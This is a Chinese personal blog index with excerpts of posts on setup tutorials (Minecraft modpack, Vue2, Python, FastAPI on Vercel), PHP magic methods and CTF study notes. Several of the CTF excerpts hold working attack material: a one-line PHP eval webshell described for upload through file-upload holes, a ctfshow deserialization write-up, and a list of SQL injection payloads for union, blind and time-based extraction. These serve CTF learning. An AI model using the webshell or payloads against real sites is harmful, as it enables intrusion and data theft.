IntoTheDark's Blog

简介本文适用于IntoTheDark整合的我的世界懒人包，分别从解压、第三方皮肤站、第三方登录、Java环境配置四个步骤面向新手玩家进行教程。 解压懒人包一般包含本体和启动器，内置加载资源，无需下载，解压即可获取全部资源。一级压缩目录通常如图所示： 将懒人包压缩包寻找一个合适的地方智能解压，打开解压后的目录即可看到上图文件夹 第三方皮肤站注册【已在此站注册请忽略】接下来打开浏览器，通常使用微软浏览器Microsoft Edge，界面如图所示： 在上图红框内输入第三方皮肤站地址或点击下述地址：http://124.222.64.79/ ，进入本文提供的第三方皮肤站。界面如图： 其中游戏内角色名为在我的世界中你想取的任意英文昵称，邀请码请联系懒人包内指定人员进行获取。注册成功后返回登录即可。 第三方登录账户登录成功之后界面会自动跳转至皮肤站首页，界面如下图所示： 接下来打开Plain Craft Launcher 2（以后简称PCL）启动器，将上图中皮肤站的按钮拖动至启动器中： Java环境配置登陆完成之后需要将压缩包内的JAVA添加至启动器中： 之后启动游戏即 ...

前言 内存取证在近年来长期占据Misc方向的中高难度地位，通常结合磁盘取证、文件隐写等方面综合考察选手的取证技术。为便于后续进行回顾学习，特在此对内存取证进行学习记录。 题目形式题目通常以磁盘文件为形式

VUE2开发环境 vue是node.js中易学易用，性能出色，适用场景丰富的 Web 前端框架，拥有比较成熟的社区和第三方库。以下以vue2为例，介绍vue框架的开发环境配置，项目建立，基本编译运行等。 环境安装vue开发需要的环境有以下： 【IDE】webstorm 【开发语言】Node.js 【部署脚手架】vue-cli Node.js安装首先打开官网下载安装包，一般为了稳定性会选择长期维护版： 除了以下需要选择安装位置的地方需要修改安装位置，其余直接无脑next 之后直接node -v查看node.js版本 版本控制（可选）因项目需要或者已经停更的第三方库需要，有时需要对node.js做版本控制，可以下载nvm来进行版本的控制，借用此工具可以通过命令行来进行node.js版本的切换。 首先从官方github下载最新的nvm-windows（下载速度慢的话可以科学上网），以下教程以本文编写日期最新版本为例。 注意在安装时在选择快捷方式链接的时候记得在你想要添加到环境变量的文件夹下创建一个目录，之后在安装时选取该目录。 之后nvm list查看nvm控制的node. ...

简介通常为了允许用户最终访问Web应用程序，我们会把代码部署到云服务器或云托管平台上。虽然有许多工具可以实现这一点，但在本文中，我们将介绍如何将 FastAPI 应用程序部署到 Vercel。 FastAPI 是一个现代且快速的 Python Web 框架，用于构建后端 API 应用程序。FastAPI 支持由 Swagger、安全模块和类型检查提供支持的 API 文档，以确保代码的正确性。 预备知识 python相关知识 了解git的基本使用 在Vercel官网注册账户 构建一个简单的fastapi程序123456789101112# app.pyimport uvicornfrom fastapi import FastAPIfrom routers import accountapp = FastAPI()app.include_router(account.router)if __name__ == '__main__': uvicorn.run("app:app", host="0.0.0.0", port=808 ...

php魔术方法 1.__construct()，类的构造函数2.__destruct()，类的析构函数3.__call()，在对象中调用一个不可访问方法时调用4.__get()，获得一个类的成员变量时调用5.__set()，设置一个类的成员变量时调用6.__isset()，当对不可访问属性调用isset()或empty()时调用7.__unset()，当对不可访问属性调用unset()时被调用。8.__sleep()，执行serialize()时，先会调用这个函数9.__wakeup()，执行unserialize()时，先会调用这个函数10.__toString()，类被当成字符串时的回应方法11.__invoke()，调用函数的方式调用一个对象时的回应方法12.__clone()，当对象复制完成时调用 __construct()12345678910<?phpclass BaseClass { public $name; function __construct($name) { $this->name = $name; ...

一句话木马简介 在很多的渗透过程中，渗透人员会上传一句话木马(Webshell)到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此。 基本应用为利用文件上传漏洞，往目标网站中上传一句话木马，然后你就可以在本地通过工具即可获取和控制整个网站目录。@表示后面即使执行错误，也不报错。eval（）函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘attack’]表示从页面中获得attack这个参数值。————————————————版权声明：本文为CSDN博主「Tr0e」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。原文链接：https://blog.csdn.net/weixin_39190897/article/details/86772765 一句话木马实例下面是最简单的一句话木马： 1<?php @eval($_POST['a']) ?> $_POST用来获取参数值 @eval()用于免报错代码执行 因此直接向该页面传参即可执行代码 详见靶机upload1 反弹 ...

python开发环境 python开发后端是最入门的开发（个人觉得），因为python语法简单，第三方库完善，可以轻松胜任后端和机器学习的工作，因此以下便从python的web后端开发、桌面应用开发、安卓应用开发三个方面开始入手，人工智能先不做赘述，之后另开专题讲解。 版本控制在有些时候，python的使用有特殊的版本要求，比如python2和python3，python3.6和python3.7-3.9和python3.10-~的有些库存在版本要求，这样的话对python的版本的控制便有了要求。以下推荐三种方法来进行版本控制： 不厌其烦的手动切换环境变量 通过相关的python库搭建虚拟环境，如virtualenv 通过Anaconda搭建虚拟环境 不同的使用情景有不一样的选择，以下举例做一些演示： 当需要手动切换环境变量的情景：CTF中py2和py3的切换、kali的py升级等 win切换环境变量： Scripts文件夹内为pip，根目录下是python，当移动版本优先级时需要同步移动。 linux更换软连接： 12345678# 删除python软链接$ rm ...

web254?username=xxxxxx&password=xxxxxx 最简单的读读码 web25512345678910if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); //接受了一个序列化对象 if($user->login($username,$password)){ //对其属性进行操作 if($user->checkVip()){ $user->vipOneKeyGetFlag(); } }else{ echo "no vip,no flag"; }} 可以看到$user是反序列化了一个用户在Cookie输入的序列化后的类，因为原来的类是public的，所以选择直接构造符合条件的属性。 12345678910<?phpclass ctfShowU ...

PayloadList 12345678910111213141516171819202122#联合查询-1' union select password,2 from ctfshow_user2 where username="flag"--+#二态联合查询盲注?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))<%d,'xiao','da')--+#时间盲注?id=1' and 1=if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),%d,1))<%d,sleep(3),1)--+#读写文件语句（into outfi ...